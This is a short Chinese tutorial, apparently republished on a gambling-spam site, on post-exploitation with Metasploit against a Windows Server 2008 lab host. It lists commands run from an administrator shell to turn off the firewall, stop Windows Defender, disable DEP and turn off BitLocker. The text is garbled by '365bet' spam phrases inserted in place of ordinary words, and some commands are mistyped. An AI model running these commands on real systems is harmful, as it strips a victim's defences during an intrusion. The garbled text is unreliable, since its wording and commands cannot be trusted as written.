后渗透利用msf关闭防火墙

365bet手机版网址:2019-08-26 365bet体育在线平台: 4818 次

运行环境:kali工具msf   ip:192.168.2.136

windows server2008    ip:192.168.2.132
已经拿到目标服务器权限,开始后渗透

是administrator权限,为了后渗透方便365bet体育在线平台需要把目标的服务器的杀毒,防火墙,以及一些防护App给关闭了。

目标服务器防火墙开着,365bet体育在线平台要使用365bet体育在线平台得到的shell给它关闭
关闭windows防火墙需要管理员或system权限


365bet体育在线平台使用上边netsh advfirewall set allprofiles state off命令来关闭
365bet体育在线平台看下服务器

然后再关闭windefebd
命令 net stop windefend
关闭DEP
命令 bcdedit.exe /set{current} nx AlwaysOff
Bitlocker磁盘加密
命令  manage-bde-off C:
manage-bde-status C:
本周分享到这里,下周再见,不见不散!

 

转自:黑白之道

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图